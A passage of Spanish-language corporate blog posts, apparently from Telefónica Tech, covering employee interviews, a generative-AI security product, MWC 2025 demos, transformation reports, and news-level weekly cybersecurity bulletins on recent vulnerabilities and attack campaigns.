conocer mujeres que desde diferentes roles, están aportando y generando valor en este rubro, como ejemplo y referencia para otras mujeres. Orlany se reserva tiempo para practicar actividades al aire libre. ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM y qué habilidades crees que son importantes para tener éxito en el sector de la tecnología? No tengas miedo a atreverte. Es un camino que requiere perseverancia, constancia y, sobre todo, que creas en ti misma y en tus capacidades. Como mujeres tenemos habilidades para desenvolvernos en la industria de la tecnología y no hay un solo camino para ello. Si realmente te apasiona, fórmate en una carrera STEAM y no dejes de aprender, porque el mundo TI cambia constantemente y requiere que nos mantengamos al día de los avances y nuevos desarrollos. Mi consejo para las mujeres que desean seguir una carrera STEAM es que sean perseverantes, constantes y a mantenga una formación continua para adaptarse a los cambios en el sector tecnológico.
13 de marzo de 2025
Cómo Security Edge permite aprovechar la IA Generativa sin riesgos
Uno de los grandes retos para las empresas actuales es cómo aprovechar las oportunidades de las aplicaciones de IA generativa, garantizando que su uso no suponga un riesgo para la organización. La IA generativa ofrece numerosas ventajas, como la automatización de tareas creativas, la generación de contenido a gran escala, y la mejora en la toma de decisiones mediante análisis avanzados. Estas capacidades pueden aumentar la productividad de los empleados, reducir costes y abrir nuevas oportunidades de innovación. Sin embargo, sus riesgos incluyen la fuga de datos sensibles, la generación de contenido erróneo o dañino, así como posibles repercusiones financieras, legales, reputacionales y/o regulatorias. Es esencial que las empresas encuentren un equilibrio entre el uso de la inteligencia artificial y la implementación de medidas de seguridad y regulaciones para reducir los riesgos asociados. ¿Cuál es el impacto de la IA Generativa? La IA generativa tiene el potencial de aumentar la productividad en hasta un 40%, ayudando a los empleados a automatizar tareas rutinarias y liberar tiempo para enfoques más estratégicos y creativos.1 La IA generativa puede acelerar el trabajo en áreas como la creación de contenido, el desarrollo de software y el servicio al cliente, lo que permite a los empleados concentrarse en tareas de mayor valor.2 La rápida implementación de la IA generativa en las empresas introduce riesgos significativos de ciberseguridad. Si no se gestionan adecuadamente, estos modelos pueden crear nuevas vulnerabilidades, exponiendo datos o sistemas sensibles a actores malintencionados. 3 Las empresas podrían perder hasta un 20% de sus ingresos anuales si no gestionan adecuadamente los riesgos asociados a la IA. Esta cifra varía según el sector y la magnitud de la implementación de la tecnología 4. ¿Cómo abordar el problema? Security Edge, con tecnología Palo Alto Networks, cuenta con el módulo AI Access Security, una solución diseñada para abordar este problema. Proporciona visibilidad en tiempo real sobre el uso de las aplicaciones de IA generativa y quién las utiliza, además de ofrecer la capacidad de establecer controles robustos de acceso a estas aplicaciones. Asimismo, proporciona una protección integral de datos, facilita la gestión de la postura de seguridad en el uso de la IA y permite aplicar controles de seguridad tanto para aplicaciones autorizadas como para aplicaciones de IA no autorizadas. Nuestra propuesta de valor Security Edge, con AI Access Security, facilita el uso seguro de las aplicaciones de IA generativa en las empresas, proporcionando: Visibilidad en tiempo real del uso de la IA, permite visualizar qué aplicaciones de IA se están utilizando y por quién. Ofrece visibilidad completa a través de un diccionario actualizado con más de 500 aplicaciones de IA Generativa y más de 60 atributos, permitiendo descubrir y monitorizar con absoluta precisión estas aplicaciones, su uso y nivel de riesgo. Funcionalidades de control de acceso, bloqueo de aplicaciones no autorizadas, aplicación de políticas de ciberseguridad y protección frente a amenazas. ⚠️ Las organizaciones deben implementar políticas de gestión de acceso que limiten el uso de aplicaciones de IA Generativa según usuarios, ubicación, riesgo, dispositivos y/o razones comerciales. Para ello, deben evaluar los riesgos de las aplicaciones autorizadas y no autorizadas. Los equipos de ciberseguridad pueden mejorar su postura frente al riesgo con visibilidad, control y protección integral para todas las aplicaciones de IA, permitidas o no. Protección total de datos: Escanea y protege información confidencial, incluidos secretos y propiedad intelectual compartida. La solución combina gestión de seguridad y protección de datos dentro de una arquitectura nativa de cloud SASE, ofreciendo controles robustos tanto para datos en movimiento como en reposo. Protección desde la aplicación de IA Generativa hacia el usuario: AI Access Security bloquea cualquier respuesta maliciosa generada por la aplicación de IA Generativa, respuestas inapropiadas e inyecciones indirectas de comandos (indirect prompt injections) para proteger a los usuarios y los activos críticos de la empresa. Protección desde los usuarios hacia la aplicación de IA Generativa: Las organizaciones deben prevenir que los usuarios inserten datos sensibles en las aplicaciones de IA Generativa; es necesario monitorizar y controlar los tipos de datos que se comparten con estas aplicaciones y de esta forma mitigar los riesgos de filtraciones de datos accidentales (o intencionados) por parte de los trabajadores Beneficios principales Proporciona visibilidad para descubrir aplicaciones de IA Generativa de alto riesgo, identificar actividades anómalas, ver derechos de acceso y prevenir incidentes de seguridad en tiempo real. Reduce los costes, el esfuerzo y la complejidad para adoptar de forma rápida y segura las aplicaciones de IA Generativa por parte de las organizaciones. Proporciona una sólida protección de datos que garantiza el cumplimiento de las regulaciones y se integra con las soluciones de seguridad de datos y SaaS existentes en las organizaciones, de esta forma se permite maximizar las inversiones realizadas y disminuir los costes de mantenimiento a largo plazo. Contribuye a la concienciación de los empleados en ciberseguridad y permite llevar a cabo auditorías y verificaciones del cumplimiento en materia de protección de datos para las aplicaciones de IA Generativa. Conclusión Mantenerse al día con las últimas amenazas es un desafío complejo y requiere una inversión significativa de tiempo. Las organizaciones deben actuar con mayor rapidez e inteligencia que los atacantes. Security Edge con AI Access Security proporciona automatización y detección de amenazas en línea y en tiempo real, aprovechando la plataforma de IA de Palo Alto Networks, Precision AI™. Esta solución protege a las organizaciones y garantiza que todos los empleados puedan adoptar de manera segura las aplicaciones de IA generativa. ______ Palo Alto Networks forma parte de nuestro ecosistemas de partners.
10 de marzo de 2025
Boletín Semanal de Ciberseguridad, 1-7 marzo
Los ataques Pass-the-Cookie pueden superar la seguridad MFA Los ataques Pass-the-Cookie permiten a los atacantes eludir la autenticación multifactor (MFA) mediante el robo de cookies de sesión. Estas cookies, como ESTSAUTH en Microsoft, permiten a los usuarios permanecer autenticados sin necesidad de volver a ingresar sus credenciales. Si un atacante obtiene una cookie válida, puede reutilizarla para acceder a la cuenta de la víctima sin requerir credenciales ni MFA. El robo de cookies suele realizarse con herramientas como LummaC2, Redline o Racoon, propagadas a través de phishing o descargas fraudulentas. Para mitigar estos ataques, se recomienda una combinación de controles detectivos, como el monitoreo de actividad inusual y análisis de comportamiento, junto con controles preventivos, como políticas de acceso condicional y restricciones de IP, entre otras. Más info 44 nuevas vulnerabilidades en Android, algunas activamente explotadas Google ha publicado el boletín mensual de seguridad de Android correspondiente al mes de marzo de 2025, en el que aborda un total de 44 vulnerabilidades, dos de las cuales habrían sido activamente explotadas. Entre los fallos puede destacarse CVE-2024-43093 (CVSSv3 de 7.8), vulnerabilidad de escalada de privilegios en el componente Framework que podría dar lugar a un acceso no autorizado a varios directorios. Por otro lado, el fallo CVE-2024-50302 (CVSSv3 de 5.5) fue empleada en un exploit 0-day ideado por Cellebrite junto a los fallos CVE-2024-53104 (CVSSv3 de 7.8) y CVE-2024-53197 para acceder al teléfono Android de un activista, obtener privilegios elevados y, probablemente, desplegar el spyware NoviSpy. Las tres vulnerabilidades residen en el kernel de Linux y fueron parcheadas a finales del año pasado. Asimismo, Google reconoció que tanto CVE-2024-43093 como CVE-2024-50302 han sido objeto de explotación, si bien esta habría sido limitada y dirigida de acuerdo con el proveedor. La empresa ha lanzado dos niveles de parches de seguridad, 2025-03-01 y 2025-03-05, para mitigar las vulnerabilidades. Más info Detectada una campaña de ataques dirigida a AWS Investigadores de Unit42 han detectado que actores maliciosos están desplegando nuevas campañas de phishing vinculadas al grupo de amenazas TGR-UNK-0011, de motivación desconocida y relacionado con JavaGhost. Estos estarían atacando entornos de Amazon Web Services (AWS), si bien sin explotar vulnerabilidades. En su lugar, aprovechan configuraciones erróneas en los entornos de las víctimas que exponen sus claves de acceso a AWS para enviar mensajes de phishing. Una vez confirmado el acceso a la cuenta de AWS de la organización, los atacantes generan credenciales temporales y una URL de inicio de sesión para permitir el acceso a la consola. Posteriormente, el grupo utiliza Amazon Simple Email Service (SES) y WorkMail para establecer la infraestructura de phishing, creando nuevos usuarios y configurando nuevas credenciales SMTP para enviar mensajes de correo electrónico. Asimismo, los actores de amenazas crean un nuevo rol IAM con una política de confianza adjunta, permitiéndoles acceder a la cuenta AWS de la organización desde otra cuenta AWS bajo su control. Más info Actores maliciosos explotan configuraciones erróneas en la nube para propagar malware Un informe de Veriti Research revela que el 40% de las redes permiten acceso "any/any" a la nube, exponiendo vulnerabilidades críticas. Los atacantes aprovechan estos errores para distribuir malware como XWorm y Sliver C2, y utilizar plataformas en la nube como servidores de comando y control (C2). El estudio muestra que XWorm usa almacenamiento S3 de AWS para distribuir ejecutables maliciosos, mientras que Remcos emplea archivos RTF infectados hospedados en la nube. Además, se ha observado que algunas APTs están utilizando Sliver C2 junto con malware basado en Rust para establecer puertas traseras y explotar vulnerabilidades 0-day. Los investigadores han alertado del incremento de la explotación de servicios en la nube como AWS, Azure y Alibaba Cloud, y recomiendan adoptar un enfoque de seguridad proactivo, restringiendo configuraciones inseguras y mejorando la monitorización de amenazas. Más info Dark Caracal refuerza su arsenal con Poco RAT en ataques a Latinoamérica Investigadores de Positive Technologies han revelado una nueva campaña de Poco RAT, vinculada al grupo cibercriminal Dark Caracal, destinada a espiar a usuarios hispanohablantes en Latinoamérica. Esta operación se basa en correos de phishing con archivos PDF maliciosos que imitan documentos financieros legítimos y redirigen a las víctimas a descargar un archivo comprimido que contiene el malware. Poco RAT, desarrollado con bibliotecas POCO C++, permite a los atacantes ejecutar comandos, capturar pantallas, manipular procesos y recopilar información del sistema, enviándola a servidores C2. Su diseño evita escrituras en disco y emplea canales cifrados para eludir la detección. Dark Caracal, que anteriormente utilizaba Bandook, ahora ha adoptado Poco RAT por su mayor sofisticación, dirigiendo sus ataques principalmente a Venezuela, Colombia y Chile. Además, el grupo es conocido por utilizar servicios legítimos como Google Drive y Dropbox, así como acortadores de URL, para enmascarar aún más sus cargas maliciosas. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
7 de marzo de 2025
#WomenWithTech: Areti Iles, innovación y transformación empresarial con Business Apps
Cuéntanos un poco sobre ti: ¿Quién eres y a qué te dedicas? Soy Areti Iles. Me uní a Telefónica Tech en abril de 2021 como consultor senior de Dynamics 365 y Power Platform dentro de la división de Aplicaciones Empresariales en Reino Unido. Actualmente, soy resposable de Servicios Profesionales para Aplicaciones Empresariales. Mi responsabilidad abarca la gestión operativa, financiera, de personas, entrega y gobernanza dentro del sector de Servicios Profesionales. Trabajo estrechamente con el director de unidad de negocio y el arquitecto de soluciones empresariales para servicios profesionales para definir y dar forma a la estrategia de nuestros clientes. ¿Cuál es tu especialización? ¿Cómo llegaste a lo que te dedicas hoy? Estoy especializa en el ecosistema de Microsoft, particularmente en Dynamics 365 y Power Platform, junto con las tecnologías asociadas. En mi puesto actual guío a los clientes en la gestión de programas y proyectos, gobernanza y gestión del cambio. Areti (izq.), es responsable de Servicios Profesionales para Aplicaciones Empresariales en Telefónica Tech UK&I. Descubrí las Aplicaciones Empresariales de Microsoft en 2009, cuando trabajaba como gestora de sistemas de negocio, y me fascinó el software y su potencial. No tardé mucho en dar el salto a la consultoría para ayudar a otros clientes a sacar el máximo partido de estas herramientas… y el resto, como se suele decir, es historia. ¿Siempre supiste que querías trabajar en el sector tecnológico? ¿Era algo que te apasionaba desde pequeña? Siempre me ha fascinado lo que se puede lograr a través de la tecnología y la ciencia, y desde muy joven me interesaron todos los campos relacionados con STEM. Sin embargo, nunca pensé que mi carrera iría por ahí. Estudié gestión de empresas y más tarde me especialicé en marketing y estrategia empresarial en la universidad. Durante mucho tiempo creí que el marketing era mi vocación, pero siempre me atraían los roles que tenían un componente tecnológico. Mi trayectoria profesional evolucionó a partir de ahí. Siempre me ha fascinado lo que se puede lograr a través de la tecnología y la ciencia. ¿Qué te motivó a elegir una profesión relacionada con la tecnología? Desde pequeña me intrigaba lo que los ordenadores eran capaces de hacer y quería entender cómo funcionaban. Para mí era como magia (¡y lo inalámbrico sigue siéndolo!). A medida que crecía, fui observando cómo los avances tecnológicos transformaban la forma en que vivimos, trabajamos y nos relacionamos. Me motivaba la idea de contribuir a innovaciones que tuvieran un impacto significativo en la sociedad, y una carrera en tecnología parecía el camino perfecto para lograrlo. No tenía un plan maestro, simplemente fui dando el siguiente paso lógico en cada momento y confié en que con el tiempo acabaría en el lugar adecuado. Viendo mi trayectoria en retrospectiva todo parece haber seguido un camino natural, pero cuando estás en medio del proceso rara vez es tan evidente. Esa incertidumbre es parte del viaje: confía en el proceso. No he tenido un plan maestro: he ido dando pasos lógicos y confiado en que con el tiempo acabaría en el lugar adecuado. ¿Cómo describirías tu trayectoria profesional hasta ahora y qué habilidades aplicas en Telefónica Tech? A lo largo de mi carrera he tenido la suerte de trabajar con directivos, responsables y mentores muy capaces que que han visto mi potencial y me han animado a aspirar siempre a más. Sin su apoyo no estaría donde estoy hoy. Aprendí muchísimo trabajando junto a ellos y adquirí habilidades muy valiosas en el camino. Como responsable de servicios profesionales utilizo una gran variedad de habilidades, ya que colaboro con diferentes equipos dentro y fuera de la empresa. En Telefónica Tech fomentamos una cultura de colaboración y mejora continua. La comunicación es clave para gestionar expectativas, evitar malentendidos y asegurar la colaboración. Con esa mentalidad intento liderar con empatía, tanto hacia nuestros equipos como hacia nuestros clientes, guiando a los equipos hacia la consecución de sus objetivos y dando apoyo cuando lo necesitan. La comunicación clara y efectiva es clave para gestionar expectativas, evitar malentendidos y garantizar la colaboración. También es fundamental identificar problemas rápidamente y encontrar soluciones eficaces, además de ser flexible y estar abierta al cambio, ya que trabajamos en un entorno dinámico y de ritmo acelerado. ¿Cómo equilibras tu responsabilidad con profesional y personal? Equilibrar un puesto de alta responsabilidad con la vida personal, especialmente cuando tienes hijos pequeños, es todo un reto. Para mí, ser extremadamente organizada es clave (¡no podría sobrevivir sin mi calendario y mis listas de tareas!). Llevar un control de las tareas y los plazos me permite asegurarme de que nada se me pase por alto. También es crucial tener claras las prioridades para gestionar la carga de trabajo de manera eficiente y abordar primero las tareas más urgentes. Otro aspecto fundamental es establecer límites y respetarlos, es decir, asegurarse de que todos conocen tu horario laboral y ceñirse a él para que el tiempo personal sea realmente personal y permita desconectar. Siempre que sea posible, delegar tareas también es importante, ya que no solo alivia la carga de trabajo, sino que también permite que los miembros del equipo aprendan y se desarrollen. Delegar tareas alivia la carga de trabajo y permite que los miembros del equipo aprendan y se desarrollen. ¿Cómo promueve Telefónica Tech la diversidad de género y la inclusión? En Telefónica Tech existe un firme compromiso con la diversidad de género y la inclusión. La cultura de la empresa es muy inclusiva y de apoyo mutuo. A lo largo de los años, hemos desarrollado numerosos programas para fomentar la igualdad de género, como #SheTransformsIT, Girls Love Tech, Empowering Women Initiative y la Alianza STEAM por el Talento Femenino. Para Areti, necesitamos ser flexibles y estar abiertos al cambio, ya que trabajamos en un entorno dinámico y de ritmo acelerado. Además, Telefónica se ha comprometido a aumentar la representación de mujeres en puestos de liderazgo, con el objetivo de alcanzar un 37% para 2027, y trabaja activamente para reducir la brecha salarial de género. También contamos con políticas que facilitan la conciliación, como horarios flexibles y permisos parentales, aspectos fundamentales para retener talento femenino. ¿Qué es para ti la iniciativa #WomenWithTech? La iniciativa #WomenWithTech busca visibilizar y apoyar a las mujeres en el sector tecnológico, destacando sus logros e inspirando a más jóvenes y mujeres a considerar una carrera en STEAM. Para mí, esta iniciativa es una forma de crear comunidad, conectar mujeres entre sí, apoyarnos mutuamente y abogar por una mayor diversidad de género en la industria tecnológica. Gracias a estas iniciativas, podemos ampliar la variedad de perspectivas en el sector y construir un entorno donde las mujeres puedan crecer y contribuir plenamente. ¿Qué aportamos las mujeres a las profesiones STEAM? Cada persona es única y aporta una perspectiva distinta. Contar con equipos diversos permite abordar los problemas de manera más innovadora y creativa, además de diseñar productos más inclusivos. En mi experiencia, muchas mujeres en profesiones STEAM han tenido que superar barreras significativas, lo que les ha otorgado una gran resiliencia y determinación. Además, pueden convertirse en referentes y mentoras para las nuevas generaciones. Las carreras en STEAM se basan en el trabajo en equipo y el aprendizaje continuo. ¿Qué consejo darías a otras mujeres que quieren seguir una carrera en STEAM? ¿Qué habilidades consideras clave para triunfar en el sector tecnológico? Definitivamente, considera una carrera en STEAM. Es un campo en constante evolución donde siempre estarás en la vanguardia de los avances y tendrás la oportunidad de aplicarlos. Confía en tus capacidades y no dejes que la duda te frene. Encuentra mentores que puedan guiarte, darte consejos y ayudarte a navegar en tu trayectoria profesional. Construir una red de contactos sólida también es fundamental. Si bien la competencia técnica es importante, lo son aún más habilidades como la resolución de problemas, la colaboración, la comunicación y la adaptabilidad. Las carreras en STEAM se basan en el trabajo en equipo y el aprendizaje continuo. La incertidumbre es parte del viaje: confía en el proceso.
6 de marzo de 2025
Cuadernos de Transformación Telefónica 2025: Innovación, progreso, sostenibilidad y más
Un año más y coincidiendo con la celebración de Mobile World Congress presentamos los Cuadernos de Transformación 2025 de Telefónica: cuatro publicaciones que exploran las últimas tendencias en Innovación, Progreso, Sostenibilidad y Open Gateway. Estos documentos recogen casos prácticos y resultados medibles, y demuestran nuestro compromiso con una transformación digital segura y sostenible que beneficie a la sociedad. Cuaderno de Innovación Este cuaderno presenta algunos de nuestros proyectos tecnológicos destacados en el ámbito de la innovación digital. Entre los temas está el Network Slicing en la era del 5G, una tecnología que transforma las comunicaciones críticas mediante redes programables. Entre otros ejemplos, hemos implementado esta solución en Extremadura para mejorar las operaciones de rescate del 112 con comunicaciones prioritarias y en tiempo real. Network Slicing 5G y 'Push To Talk' en la nube mejora la coordinación y toma de decisiones durante emergencias. También se analiza el uso de satélites LEO para la conectividad en zonas remotas y afectadas por desastres, proporcionando velocidades de hasta 300 Mbps y latencias reducidas para garantizar una respuesta eficaz en emergencias. La Cuarta Fachada de Espacio Movistar es una pantalla LED de 23 metros de largo y cuatro de altura que utiliza IA Generativa para mostrar contenido. Además, recoge el caso de Espacio Movistar, nuestro centro de innovación en la sede Telefónica de la Gran Vía de Madrid. Este centro combina tecnología digital con elementos históricos restaurados, ofrece experiencias inmersivas y promueve el uso de IA para mejorar la interacción con los visitantes. Seguridad en la era cuántica El cuaderno de Innovación también aborda la seguridad en la era de la computación cuántica a través de nuestra iniciativa Quantum-Safe Networks. La computación cuántica promete revolucionar sectores como la medicina y la seguridad de la información; sin embargo, plantea desafíos significativos en ciberseguridad. Los futuros ordenadores cuánticos podrán romper los algoritmos de cifrado actuales, comprometiendo la confidencialidad de los datos protegidos con cifrado clásico. Quantum-Safe Networks protege infraestructuras, dispositivos y datos frente a ataques cuánticos. Una amenaza emergente es la práctica "store-now-decrypt-later", donde actores malintencionados almacenan información cifrada hoy para descifrarla en el futuro con tecnología cuántica. Para contrarrestar este riesgo, desde Telefónica estamos implementando soluciones que combinan criptografía clásica con algoritmos poscuánticos añadiendo una capa adicional de protección a redes, conectividad IoT industrial y servicios. Cuaderno de Progreso El Cuaderno de Progreso documenta iniciativas que mejoran la seguridad y eficiencia operativa en distintas industrias. Un caso recogido es nuestra colaboración con el Levan Center of Innovation en Florida, donde desde Telefónica Tech hemos implementado soluciones de Ciberseguridad basadas en el marco NIST y el servicio SOC-as-a-Service. Esta colaboración protege activos digitales y asegura los entornos empresariales y gubernamentales de la región. Otro ejemplo es el caso de éxito de Hunter Latam, un servicio que utiliza conectividad IoT y localización avanzada para recuperar vehículos robados mediante seguimiento en tiempo real, incluso fuera de la red local del país de origen. Este caso muestra el uso de la conectividad IoT en la protección de activos y la optimización operativa. La solución IoT de Telefónica Tech, a través de Kite Platform, ha permitido a Hunter Latam recuperar vehículos robados de manera eficiente. Cuaderno de Sostenibilidad La sostenibilidad es fundamental en Telefónica. El cuaderno de Sostenibilidad recoge nuestro compromiso con una digitalización responsable alineada con criterios ESG (ambientales, sociales y de gobernanza). Presenta datos sobre cómo Telefónica ha reducido su consumo energético un 7,9% desde 2015, a pesar de que el tráfico de datos se ha multiplicado por 8,3 en el mismo periodo. También hemos disminuido nuestras emisiones de CO₂ en un 52% y desarrollado soluciones Eco Smart, que en 2024 nos ayudaron a evitar la emisión de 17,4 millones de toneladas de CO₂. Como parte de nuestro compromiso con la inclusión digital hemos extendido la cobertura 5G de Telefónica al 74% de nuestros mercados y alcanzaremos 106 millones de hogares con fibra óptica para 2026. A través de la Fundación Telefónica, capacitamos a más de un millón de personas en habilidades digitales, fomentando la empleabilidad y reduciendo la brecha digital. Además, la seguridad es prioritaria: operamos una red global de Centros de Operaciones de Seguridad (SOC) para proteger los datos y activos digitales de nuestros clientes. A la vez, promovemos una inteligencia artificial ética, alineada con los principios de la Unión Europea, asegurando un desarrollo tecnológico confiable, inclusivo y transparente. Cuaderno de Open Gateway El cuaderno de Telefónica Open Gateway explica nuestra participación en la iniciativa global de la GSMA que transforma las redes de telecomunicaciones en plataformas programables. A través de las API globales, desde Telefónica y junto a 69 operadoras facilitamos el acceso a capacidades de red avanzadas para desarrolladores y empresas, permitiendo la creación de nuevos servicios digitales de forma estandarizada e interoperable. Open Gateway facilita la creación de nuevos servicios digitales más seguros y sostenibles, abriendo nuevas oportunidades en el ecosistema digital. Actualmente, desde Telefónica ofrecemos un catálogo de 11 API centradas en soluciones antifraude y otros servicios avanzados en España, Brasil y Alemania. Esta iniciativa también ha dado lugar a la creación de Aduna, una compañía que reúne a más de una docena de operadoras globales para acelerar la adopción de Open Gateway y estandarizar las API a nivel mundial. ■ Acceso abierto a los Cuadernos de Transformación 2025 →
5 de marzo de 2025
Nuestras demos en MWC 2025: Ciberseguridad e IA, drones 5G y criptografía poscuántica
Durante la celebración de Mobile World Congress 2025, desde Telefónica Tech participamos en las demos interactivas instaladas en el stand de Telefónica (Hall 3 – 3K31) que ponemos a disposición de cualquier visitante que desee imaginar con nosotros el futuro. El stand de Telefónica ocupa 960 metros cuadrados, con un tercio del espacio dedicado a tres demostraciones clave. Estas incluyen nuestras soluciones de Ciberseguridad, exhibidas a través del Centro de Operaciones Digitales (DOC) de Telefónica Tech; nuestras capacidades de conectividad 5G, combinadas con Open Gateway y aplicadas dentro de nuestra solución integral para drones; y la relevancia de la criptografía poscuántica en la protección de redes y datos frente a los desafíos que plantea la computación cuántica. Demo de las capacidades del DOC de Telefónica Tech Nuestra demostración del Centro de Operaciones Digitales (DOC) ofrece a los visitantes una visión del trabajo diario de nuestros expertos en Ciberseguridad. Esta demo destaca las capacidades avanzadas de monitorización y operación que Telefónica Tech proporciona 24/7 a través del DOC, con sedes en Madrid y Bogotá, que opera en conjunto con nuestra red global de Centros de Operaciones de Seguridad (SOC). Los asistentes pueden participar en la simulación de un incidente de Ciberseguridad, como un ataque de ransomware. A través de esta experiencia práctica, los asistentes pueden interactuar en la resolución de múltiples incidentes simulados y comprobar la capacidad de los profesionales de Telefónica Tech para anticipar, prevenir y responder a los ciberataques con soluciones avanzadas de seguridad. Un aspecto clave de esta demostración es el papel dual de la IA, que se presenta tanto como una herramienta ofensiva para los ciberataques como un mecanismo defensivo para mitigar amenazas. Los participantes pueden observar estrategias de ataque impulsadas por IA y explorar cómo los sistemas de defensa basados en IA neutralizan estas amenazas en tiempo real. Demo Quantum-Safe Networks También participamos en la demo Quantum-Safe Networks (Redes Cuánticamente Seguras) donde presentamos soluciones innovadoras para mitigar las amenazas cuánticas y dotar a las empresas de herramientas que les permitan afrontar los retos actuales mientras se preparan para la computación cuántica del futuro. Quantum-Safe Networks proporciona soluciones de criptografía post-cuántica para proteger redes privadas, dispositivos IoT en entornos críticos y eSIMs en redes abiertas. En el stand de Telefónica, mostramos casos de uso reales de esta tecnología, incluyendo construir redes privadas seguras con cifrado poscuántico, incluso bajo el agua; proteger redes abiertas en el sector utilities, asegurar las eSIM y sus datos; y conectar con cifrados poscuántico dispositivos IoT en entornos críticos gracias a nuestra plataforma Kite de Telefónica Tech, que permite monitorizar y controlar los dispositivos IoT en tiempo real y de forma remota. Demo Open Gateway 5G Drones La demo Drones 5G con Open Gateway combina nuestra solución integral para drones con la red 5G de alto rendimiento de Telefónica y las APIs de Open Gateway. Esta integración garantiza la seguridad y eficiencia de los drones en el espacio aéreo, en cumplimiento con la normativa U-Space europea. Esta demostración muestra aplicaciones del mundo real, como el transporte de suministros médicos, la prevención de incendios forestales y la gestión de operaciones logísticas. Esto es posible gracias a la combinación de la conectividad 5G, la IA y un centro avanzado de control remoto que supervisa en tiempo real las operaciones de los drones. Nuestra solución integral para drones redefine la movilidad aérea, permitiendo la planificación segura de rutas y optimizando las operaciones con un enfoque escalable y sostenible. Analítica de vídeo impulsada por IA Un año más, desde Telefónica Tech hemos desplegado la tecnología de analítica de vídeo con IA de C2RO en el stand de Telefónica. Este sistema de seguimiento de presencia en tiempo real utiliza análisis de vídeo basado en IA para obtener información sobre la actividad de los visitantes de forma anónima, sin recopilar datos biométricos. Telefónica en MWC 2025. Esta solución permite a las empresas comprender los patrones de movimiento y el comportamiento de los clientes dentro de un espacio físico, optimizando la disposición de áreas, el nivel de interacción y la eficiencia operativa. Marc Murtra, presidente ejecutivo de Telefónica, en MWC 2025 Marc Mutra, presidente ejecutivo de Telefónica. Durante la sesión de apertura del MWC 2025, el presidente ejecutivo de Telefónica, Marc Murtra, ha destacado el papel fundamental del sector de las telecomunicaciones en el progreso tecnológico de Europa. Además, ha subrayado el potencial de las redes de ultra banda ancha de nueva generación y las oportunidades que ofrecen las arquitecturas Cloud. Sin embargo, avisa de que solo mediante economías de escala y un aumento de capacidad será posible "lograr mejoras significativas en Europa." Murtra ha señalado que la fragmentación excesiva del mercado, la sobrerregulación y la falta de rentabilidad en el sector son los principales obstáculos que frenan el crecimiento tecnológico de Europa. Comparó esta situación con regiones como EE UU, Oriente Medio y Asia, donde existen condiciones más favorables para la innovación y el desarrollo de empresas tecnológicas que impulsan la transformación digital. Más →
4 de marzo de 2025
Boletín Semanal de Ciberseguridad, 22-28 febrero
Vulnerabilidades en Rsync exponen millones de servidores a posibles ataques Recientemente fueron descubiertas varias vulnerabilidades críticas en Rsync, una herramienta popular de sincronización de archivos, que exponen millones de servidores a posibles ataques remotos. Estos fallos, presentes en la versión 3.2.7 y anteriores, permiten la ejecución remota de código, la filtración de datos sensibles y la manipulación del sistema de archivos. Las vulnerabilidades incluyen un desbordamiento de búfer (CVE-2024-12084, CVSSv3 9.8), la fuga de datos de memoria (CVE-2024-12085, CVSSv3 7.5), la exfiltración de archivos del cliente (CVE-2024-12086, CVSSv3 6.1), el escape de directorios mediante enlaces simbólicos (CVE-2024-12087, CVSSv3 6.5) y la elusión de la función de seguridad -safe-links (CVE-2024-12088, CVSSv3 6.5). Existen exploits de prueba de concepto (PoC) para estas vulnerabilidades; por lo que se recomienda actualizar a la versión 3.2.8 o aplicar los parches del proveedor, deshabilitar el acceso anónimo, auditar registros de sincronización y restringir el uso de Rsync a servidores de confianza. Más info Descubierta una vulnerabilidad RCE en MITRE Caldera Recientemente se ha descubierto una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a MITRE Caldera. Identificada como CVE-2025-27364 y con una puntuación máxima de 10.0 en la escala CVSSv3, esta vulnerabilidad permite la ejecución remota de código en todas las versiones de Caldera, excepto en las más recientes (5.1.0+ y la rama master source). Esta plataforma de emulación de adversarios, utilizada por los equipos Blue Team y Red Team para simular ataques y reforzar defensas, podría ser secuestrada a distancia. El fallo se activa en configuraciones predeterminadas cuando Go, Python y GCC están instalados, lo cual es muy común. La vulnerabilidad se relaciona con el despliegue de los agentes Manx y Sandcat, permitiendo a un atacante ejecutar operaciones maliciosas sin autenticación previa mediante una petición HTTPS especialmente diseñada. Aunque los desarrolladores ya conocían el riesgo de este punto final de la API, Dawid Kulikowski, quien descubrió el fallo, compartió un código de prueba de concepto (PoC) incompleto para evitar abusos. La vulnerabilidad ya ha sido parcheada en el código base, por lo que se recomienda a los usuarios actualizar de inmediato a la última versión. Más info El robo de 1500 millones a ByBit se originó en la infraestructura de Safe{Wallet} El grupo norcoreano Lazarus robó 1500 millones de dólares en criptomonedas de Bybit tras comprometer un dispositivo de un desarrollador de Safe{Wallet}. Según investigaciones de Sygnia y Verichains, el ataque se originó en la infraestructura de Safe{Wallet}, inyectando JavaScript malicioso en su plataforma para acceder a los fondos de Bybit. Los atacantes modificaron el código previamente al día del ataque y eliminaron las pruebas poco después. Se trata del mayor robo de criptomonedas de la historia, con Lazarus vinculado a ataques previos. Bybit ha restaurado sus reservas de ETH y Safe{Wallet} ha reforzado su seguridad. Más info LockBit explota vulnerabilidad en Atlassian Confluence para un rápido despliegue de ransomware Una investigación de The DFIR Report reveló que los operadores del ransomware LockBit llevaron a cabo un ataque altamente coordinado aprovechando la vulnerabilidad crítica CVE-2023-22527 (CVSSv3 10.0 según fabricante) en servidores Atlassian Confluence expuestos, permitiéndoles ejecutar comandos remotos sin autenticación mediante inyecciones maliciosas de Object-Graph Navigation Language (OGNL). Según el reporte, tras obtener acceso inicial los actores de amenazas realizaron un reconocimiento del sistema, desplegaron AnyDesk para persistencia y usaron Metasploit para establecer canales de comando y control (C2). Además, escalaron privilegios, desactivaron defensas de seguridad y se movieron lateralmente a través de la red mediante RDP, apuntando a servidores críticos. Asimismo, extrajeron credenciales con Mimikatz, utilizaron Rclone para exfiltrar datos a MEGA.io y cubrieron sus huellas eliminando registros. Finalmente, desplegaron el ransomware LockBit mediante PDQ Deploy, logrando cifrar archivos en toda la red en poco más de dos horas, demostrando una velocidad y precisión excepcionales. Más info Australia prohíbe el uso de productos de Kaspersky en sus dispositivos El gobierno australiano ha prohibido todos los productos y servicios web de Kaspersky Lab en sus sistemas y dispositivos. Esta decisión se tomó tras un análisis que concluyó que la empresa representa un riesgo significativo para la seguridad del país. Stephanie Foster, Secretaria del Departamento de Asuntos Internos, justificó la medida citando amenazas de interferencia extranjera, espionaje y sabotaje. Más info ◾ Este boletín es 